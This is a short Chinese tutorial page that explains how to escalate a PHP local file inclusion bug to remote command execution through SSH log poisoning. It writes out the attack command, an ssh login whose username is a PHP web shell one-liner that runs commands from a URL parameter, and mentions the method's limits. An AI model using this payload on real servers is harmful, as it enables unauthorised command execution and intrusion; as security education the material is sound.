来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 文章的总体思路就是:使用ssh #39;pre?echo system($_GET[#39;cmd#39;]); exit;?#39;@10.10.11.33登入,然后会在ssh的登入日志里记录,再让存在包含漏洞php去包含错误日志文件来达到目的。包含正常的...
|
文章的总体思路就是:
使用 ssh '<pre><?echo system($_GET['cmd']); exit;?>'@10.10.11.33 登入,然后会在ssh的登入日志里记录,再让存在包含漏洞php去包含错误日志文件来达到目的。 包含正常的日志文件  使用特定的一句话木马作为帐号登入,产生含有一句话的日志文件  再次包含日志文件 www.2cto.com  成功执行  不过这个方法可能不是很通用, 首先,日志文件路径是不特定的,根据管理员习惯 其次,如果日志文件很大的情况下,估计包含就不会成功了 摘自: http://lanmaster53.com/2011/05/local-file-inclusion-to-remote-command-execution-using-ssh/ 译者:http://www.ayhacker.net/ayblog/read.php?173 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
